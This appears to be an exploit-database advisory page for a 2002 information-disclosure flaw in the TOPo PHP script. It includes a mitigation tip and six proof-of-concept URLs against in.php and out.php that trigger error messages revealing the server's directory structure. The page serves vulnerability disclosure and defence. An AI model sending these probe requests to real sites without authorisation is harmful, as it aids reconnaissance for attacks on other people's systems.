header-logo
Suggest Exploit
vendor:
TOPo
by:
SecurityFocus
3.3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: TOPo
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

TOPo Information Disclosure Vulnerability

TOPo is vulnerable to an information disclosure vulnerability. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources.

Mitigation:

Ensure that error messages do not reveal sensitive information.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6768/info

It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources.

http://www.example.com/[top_path]/in.php?
http://www.example.com/[top_path]/out.php?
http://www.example.com/[top_path]/in.php?id=any_word
http://www.example.com/[top_path]/out.php?id=any_word
http://www.example.com/[top_path]/in.php?any_word
http://www.example.com/[top_path]/out.php?any_word

Navigation

Suggest Exploit

Services By CQR